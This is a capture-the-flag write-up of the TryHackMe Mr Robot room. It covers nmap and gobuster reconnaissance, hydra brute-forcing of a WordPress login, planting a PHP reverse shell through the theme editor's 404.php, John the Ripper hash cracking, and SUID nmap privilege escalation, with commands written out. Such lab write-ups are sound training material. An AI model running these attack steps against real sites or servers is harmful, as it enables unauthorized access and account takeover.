Mr Robot CTF Writeup

Today we will be going through the Mr Robot themed room on tryhackme.com. This room is based on the TV show and was really fun to work through. Follow along until we root this box together!

This write-up is dedicated to my Cyber Security professor Dr. Cooper. Thanks for the great semester!

Initial Scans

Firstly, we start off with a Nmap scan. This scan looks at the open ports and what is running on each of them.

kali@kali-> nmap -sC -sV -oA nmap 10.10.223.195
Nmap scan report for 10.10.223.195
Host is up (0.10s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open   ssl/http Apache httpd
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr  8 11:49:29 2022 -- 1 IP address (1 host up) scanned in 34.04 seconds

This shows up with three ports. Two are open and they are web server ports for HTTP(80) and HTTPS(443). The ssh port 22 is closed, so lets focus on the web ports.

GObuster

To find any interesting pages or artifacts on a website I always start out by looking at the GObuster scan. This tool uses brute force to guess common pages and folders and gives us a map of the site without having to manually look through every link.

kali@kali-> gobuster dir -u http://10.10.108.85:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.108.85:80
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/11 19:38:35 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 235] [--> http://10.10.108.85/images/]
/blog                 (Status: 301) [Size: 233] [--> http://10.10.108.85/blog/]  
/rss                  (Status: 200) [Size: 364]                                  
/sitemap              (Status: 200) [Size: 0]                                    
/login                (Status: 302) [Size: 0] [--> http://10.10.108.85:80/wp-login.php]
/0                    (Status: 301) [Size: 0] [--> http://10.10.108.85:80/0/]          
/feed                 (Status: 200) [Size: 809]                                        
/video                (Status: 301) [Size: 234] [--> http://10.10.108.85/video/]       
/image                (Status: 301) [Size: 0] [--> http://10.10.108.85:80/image/]      
/atom                 (Status: 200) [Size: 623]                                        
/wp-content           (Status: 301) [Size: 239] [--> http://10.10.108.85/wp-content/]  
/admin                (Status: 301) [Size: 234] [--> http://10.10.108.85/admin/]       
/audio                (Status: 301) [Size: 234] [--> http://10.10.108.85/audio/]       
/intro                (Status: 200) [Size: 516314]                                     
/wp-login             (Status: 200) [Size: 2627]                                       
/css                  (Status: 301) [Size: 232] [--> http://10.10.108.85/css/]         
/rss2                 (Status: 200) [Size: 809]                                        
/license              (Status: 200) [Size: 309]                                        
/wp-includes          (Status: 301) [Size: 240] [--> http://10.10.108.85/wp-includes/] 
/js                   (Status: 301) [Size: 231] [--> http://10.10.108.85/js/]          
/Image                (Status: 301) [Size: 0] [--> http://10.10.108.85:80/Image/]      
/rdf                  (Status: 200) [Size: 813]                                        
/page1                (Status: 200) [Size: 8221]                                       
/readme               (Status: 200) [Size: 64]                                         
/robots               (Status: 200) [Size: 41]                                         
/dashboard            (Status: 302) [Size: 0] [--> http://10.10.108.85:80/wp-admin/]   
/%20                  (Status: 301) [Size: 0] [--> http://10.10.108.85:80/]            
Progress: 4951 / 220561 (2.24%)                                                       ^C
[!] Keyboard interrupt detected, terminating.
                                                                                       
===============================================================
2022/04/11 19:49:51 Finished
===============================================================

Here we see a few pages that indicate to us that WordPress is running on this site. The /wp-login and /wp-admin are dead giveaways that WordPress is present. Navigating to the /wp-login page we see we have a login prompt.

Lets look at the /robots page and see if there is anything else interesting there.

A list of some files located on the website that they did not want index on search engines. These could be useful files, let’s download them and find out.

It looks like we found our first flag, and a set of possible usernames and passwords! Saving this info to our working folder will help us later.

Brute Forcing login Password

We can attempt to gain access to this login page by brute force, or guessing, the password. We found what seemed to be a list of passwords or usernames on during our initial scans phase. Let’s use those to guess the credentials of this login page.

We need to capture the login by attempting to log in and using FoxyProxy or another similar browser plugin to proxy to our burp suite intercept.

We are interested in the last line here we need to save the format of the login to use with our brute force tool. Copy the first part of the last line up until the end of the submitted password like so.

kali@kali-> hydra -L fsocity.dic -p password 10.10.151.96 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid" -t 30

This command gives a list of usernames with -L, a single password with -p, our ip address, the type of post which is http-post-form, the address of the login page, the login method used by the post form, and the error message indicating the wrong username is entered and finally the number of threads to use.

Running this we get the username Elliot. Now we can do the same thing just with a list of passwords to get the full login credentials.

kali@kali->  hydra -l Elliot -P tail-fsocity.dic 10.10.151.96 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you entered for the username" -t 30

After running we should get the login credentials!

Gaining a foothold on the System

Now that we have access to the WordPress dashboard we can upload a PHP reverse shell to gain access to the system.

First we will need to find a suitable reverse shell. There is some located in the usr/share/laudanum directory. Find one that you want to use and copy it to our working directory.

┌──(kali㉿kali)-[~/Documents/mrRobot]
└─$ locate php-reverse-shell                                                1 ⨯
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php
                                                                                
┌──(kali㉿kali)-[~/Documents/mrRobot]
└─$ cp /usr/share/laudanum/php/php-reverse-shell.php ~/Documents/mrRobot

We need to edit the IP address and port on our shell to call back to our machine opening up in your favorite text editor like nano, vi, or vim will do the trick.

Scroll down until you see the IP and port variables and change those to match your tun0 IP that tryhackme’s VPN uses. Pick a port that is not in use and remember which one so we can set up our listener.

To upload the shell we can use the appearance editor in WordPress. This will allow us to replace an existing PHP page with our malicious code.

Go to appearance -> editor -> 404.php

Here is where we will replace the existing code with our shell code.

Now that our code is updated we can click ‘Update File’ and get ready to catch our shell. Open up a terminal and use Net Cat to open a listener on your port from the reverse shell script.

All we have to do to get the shell is to navigate to the 404.php page that we edited and our reverse shell will be run and sent back to us.

Success, we now have a foothold on the system!

Initial Reconnaissance

Initially we upgraded our shell with python, and took a look in the home folder. Here we found a password hash that we had access to and another key of the same name format as the one we earlier found on the web server. We didn’t have access to that flag though, so lets try cracking this hash and using the account to open it.

Cracking Hash with John The Ripper

kali@kali-> john -format=Raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

This command will crack the password and output the plaintext for you to view. After we have the password we will use the username and password to login to the robot account and view the 2nd key.

Privilege Escalation

We can use preinstalled binaries with SUID set for privilege escalation. To find these binaries we use the following command

find / -perm -u=s -type f 2>/dev/null

We saw that Nmap is in the list of SUID bit binaries. This means that we can run Nmap interactive and be root. To get a shell from Nmap interactive we simply run !sh. Lastly, we can navigate to the root folder and grab the final flag.

It has been a great journey walking though this machine with you. Take care and happy hacking!